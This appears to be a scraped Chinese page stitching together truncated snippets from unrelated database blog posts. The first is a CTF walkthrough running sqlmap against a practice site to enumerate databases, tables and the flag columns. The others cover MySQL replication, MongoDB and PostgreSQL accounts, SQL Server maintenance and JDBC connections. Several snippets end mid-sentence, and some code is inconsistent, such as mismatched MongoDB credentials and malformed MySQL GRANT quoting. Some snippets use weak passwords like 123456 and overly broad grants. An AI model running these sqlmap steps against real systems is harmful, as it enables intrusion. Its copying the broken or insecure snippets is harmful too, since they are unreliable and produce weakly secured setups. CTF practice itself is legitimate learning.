数据库

就以实验吧上那个简单的sql注入题为例吧，不过那道题确实经典，把sqlmap的整个使用过程都展现了一遍，先奉上那道题的地址： http://ctf5.shiyanbar.com/web/index_3.php 上截图： 第一步：先随便输一个参数，然后开始用工具，第一句话是使用-U 参数指定URL，如果URL存在注入点，将会显示web容器，数据库版本信息，如图 第二步： 使用 -dbs参数读取数据库，如图 第三步： 查看当前应用程序数据库 (不能发图了，每次发图还带用鼠标，宿舍关灯了，不能打扰其他人) 第四步：sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --table -D "web1" Database: web1 [2 tables] +-------+ | flag | | web_1 | +-------+ 列出指定数据库的所有表 （使用--table 参数获取数据库表，-D参数指定数据库） 第五步：sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T "flag" -D "web1" Database: web1 Table: flag [2 columns] +--------+----------+ |

今天发现数据库事务日志竟然达到500多M,这也难怪,修改数据如此频繁 想要清理,发现没有办法,上GOOGLE上一搜,在ZDNET上找到答案也 先分离数据库,然后删掉日志文件,接下来再attach数据库,SQL会显示日志文件丢失,按确定ATTACH的时候,会提示你创建新的日志文件,只要确定即可完成,简单方便 不过,需要提醒的是,第一,在删除日志前,最好将老的日志文件全都备份一下 第二,如果你的事务日志存放于多个物理文件中,那么,上面的方面就没办法帮你清理喽 不过,下面的方法绝对快 backup log db_name with no_log dbcc shrinkfile (northwind_log,5) 来源： https://www.cnblogs.com/Heroman/archive/2004/12/15/77572.html

Mongodb安全认证在单实例和副本集两种情况下不太一样，单实例相对简单，只要在启动时加上 --auth参数即可，但副本集则需要keyfile。 一、单实例 1.启动服务（先不要加auth参数） 2.登陆后切换到admin库并添加管理员账号 2.1 创建系统管理员用户 默认条件下，超级管理员只能用于帐号管理，不能进行其他数据库操作，可以通过自己给自己授权实现。生产环境中的管理员，如果某个帐号包含了角色userAdminAnyDatabase或者userAdmin，就应该仅仅用于帐号和角色管理，不应该再授予别的角色了。 （1）我们首先就要建立一个超级管理员，然后再用超级管理员建立其他帐号： use admin db.addUser( { user: "superman", pwd: "talent", roles: [ "userAdminAnyDatabase" ] } ) （2）为帐号启用admin数据库认证,这样他就可以操作admin数据库了。 db.auth("root", "123456") //为账号授权 db.system.users.find(); //查看当前已有的用户信息 （3）使用用刚才的超级帐号登录数据库(admin)mongo localhost:27017admin -u superman -p superman 现在，我们就可以为其他数据库添加用户了：

试验环境 : 　　主服务器 IP:192.168.17.99 　　从服务器 IP:192.168.17.88 配置 : 一、主库 1.1、创建一个复制用户，具有replication slave 权限。 mysql > grant all on *.* to ‘jack@’192.168.17.88′ identified by ‘123; 1.2、编辑my.cnf文件 　　vi /etc/my.cnf 　　添加 　　server-id=88 # 标记不同数据库，不能与其他数据库一样 　　并开启 log-bin二进制日志文件 　　log-bin=mysql-bin 　　注 :需要把默认的server-id=1去掉 　　关闭 mysql 　　[root@cent] /usr/local/mysql/bin/mysqladmin -uroot -p shutdown 1.3、启动mysql数据库 /usr/local/mysql/bin/mysqld_safe –user=mysql & 1.4 、得到 binlog日志文件名和偏移量 mysql > show master status; +——————+———-+————–+——————+ | File | Position | Binlog_Do_DB | Binlog_Ignore_DB | +——————+———-+————–

PGsql 基本用户权限操作 https://www.cnblogs.com/jokerjason/p/9389526.html Ⅰ. 安装与初始账户密码修改 1. 安装 sudo apt-get install postgresql-9.4 2. 管理员身份打开pg sudo -u postgres psql sudo -u postgres 表示以postgres 用户身份登录 PostgreSQL数据默认会创建一个postgres的数据库用户作为数据库的管理员，密码随机； 3. 修改密码 ALTER USER postgres WITH PASSWORD '123456'; Ⅱ. 修改指定用户指定权限 alter user postgres superuser createrole createdb replication; 注意：如果出现 FATAL： role '...' is not permitted to log in. 的错误 alter user postgres superuser createrole createdb replication login; 在授权后面加入login 即可； Ⅲ. 数据库更改属于postgres用户 postgres=# alter database database_name OWNER TO new_user; IV.

当使用 sp_attach_db 系统存储过程附加数据库时- - Tag： 当使用 sp_attach_db 系统存储过程附加数据库时 //附加数据库 sp_attach_db 当使用 sp_attach_db 系统存储过程附加数据库时。 sp_attach_db:将数据库附加到服务器。 语法 sp_attach_db [ @dbname = ] 'dbname' , [ @filename1 = ] 'filename_n' [ ,...16 ] 参数 [@dbname =] 'dbname' 要附加到服务器的数据库的名称。该名称必须是唯一的。dbname 的数据类型为 sysname，默认值为 NULL。 [@filename1 =] 'filename_n' 数据库文件的物理名称，包括路径。filename_n 的数据类型为 nvarchar(260)，默认值为 NULL。最多可以指定 16 个文件名。 参数名称以 @filename1 开始，递增到 @filename16。文件名列表至少必须包括主文件，主文件包含指向数据库中其它文件的系统表。 该列表还必须包括数据库分离后所有被移动的文件。 返回代码值:0（成功）或 1（失败） eg:下面的示例将 pubs 中的两个文件附加到当前服务器。 EXEC sp_attach_db @dbname = N'pubs',

基本数据库对象：表，视图，索引，触发器，存储过程，用户，图表，规则，默认值。 表：表示数据库中最最基本的对象，我们的数据都存放在表中。 表由行，列构成。列为字段，行为记录。一般我们在设计的表的时候操作的是列，在操作数据的时候用的是行。 一、表结构的操作： 表的基本操作：创建，修改，删除。 要创建一个表，上篇博客中写到，添加数据库对象就像是给大楼里招住户，表中的数据就是每个用户的家庭成员。表就是其中的住户。那么住户要搬进去，就要根据自己的需要给房间进行装修。放到数据库中，就是我们建表之前的设计阶段。 设计阶段要考虑什么呢？ 建表不得不说的几个概念：约束，默认值，规则， 约束包括主键，外键，check，唯一性，null 。 主键：指定表的一列或几列在表中具有唯一性。 外键：是定义表之间的约束。例如：A表中的列跟B表中的主键相同时，可以将A表中的这列设置为A 表的外键。 Check:通过检查输入到列中的值来判断是否合理。 唯一性：用来确保不受主键约束的列上的数据的唯一性。 Null:该列是否可以为空值。 规则：对列中的数据和自定义数据类型的值进行的规定和限制。注意这里多了一个自定义和数据类型，约束中没有哦！ 默认值：如果输入记录时，某列没有指定值，系统自动插入的值。 标识列：可以为某一列设置为标识列，这样就不必为这列赋值了，系统会自动添加行序号。但是这列数据类型必需是数据类型的哦

一、创建数据库 mysql> create database jira; Query OK, 0 rows affected (0.09 sec) 二、创建用户 mysql> create user 'jira'@'%' identified by 'jira123'; Query OK, 0 rows affected (0.09 sec) 三、授权用户 mysql> grant all privileges on jira.* to 'jira'@'%' with grant option; Query OK, 0 rows affected (0.10 sec) mysql> flush privileges; Query OK, 0 rows affected (0.01 sec) 来源： https://www.cnblogs.com/xxsl/p/10791137.html

以下配置在本机上已经成功: 实现功能：A为主服务器，B为从服务器，初始状态时，A和B中的数据信息相同，当A中的数据发生变化时，B也跟着发生相应的变化，使得A和B的数据信息同步，达到备份的目的。 环境： A、B的MySQL数据库版本同为4.1.20 A： 操作系统：Windows 2003 server IP地址：192.168.100.1 B： 操作系统：Windows 2003 server 的IP地址：192.168.100.2 配置过程： 1、在A的数据库中建立一个备份帐户，命令如下： GRANT REPLICATION SLAVE,RELOAD,SUPER ON *.* TO backup@'192.168.100.2' IDENTIFIED BY ‘1234’; 建立一个帐户backup，并且只能允许从192.168.100.2这个地址上来登陆，密码是1234。 2、因为mysql版本新密码算法不同，所以进入mysql下，输入：set password for 'backup'@'192.168.100.2'=old_password('1234'); 3、关停A服务器，将A中的数据拷贝到B服务器中，使得A和B中的数据同步，并且确保在全部设置操作结束前，禁止在A和B服务器中进行写操作，使得两数据库中的数据一定要相同！ 4、对A服务器的配置进行修改，打开mysql/my

之前有试过Jmeter的JDBC请求，挺方便的，今天下午闲来没事，看见soapUI里面也有一个JDBC请求，便也来试试。 首先添加一个JDBC请求，然后直接把Jmeter的一些链接参数复制过去，一直报错，没法访问数据库。便到处百度查看了下，最后还是去官网上找到了答案，记录下来供分享，以后大家遇到类似的需要用到，可以不用撞破头啦！ 1.添加一个JDBC request 2.添加完毕后，看到JDBC的内容页面： 需要我们自己去添加驱动以及连接字符串。 注意：驱动需要我们自己去下载，mysql-connector-java-5.1.7-bin.jar，下载好后，把它直接放在 soapui的 lib文件夹下面。 看到上面的连接方式，我这里就只说了mysql的连接方式。 Driver：Mysql/com.mysql.jdbc.Driver ---->这里是mysql的驱动引用方式。 Connection String:jdbc:mysql://120.44.25.15:3306/test?user=root&password=123456 ---->这里是连接数据库字符串的拼接方式。下面进行特别说明： 连接字符串的组成方式如下： jdbc:mysql://ip[数据库所在的服务器IP地址]:port[端口号]/database[数据库名称]?user=[这里填写登录数据库用户名]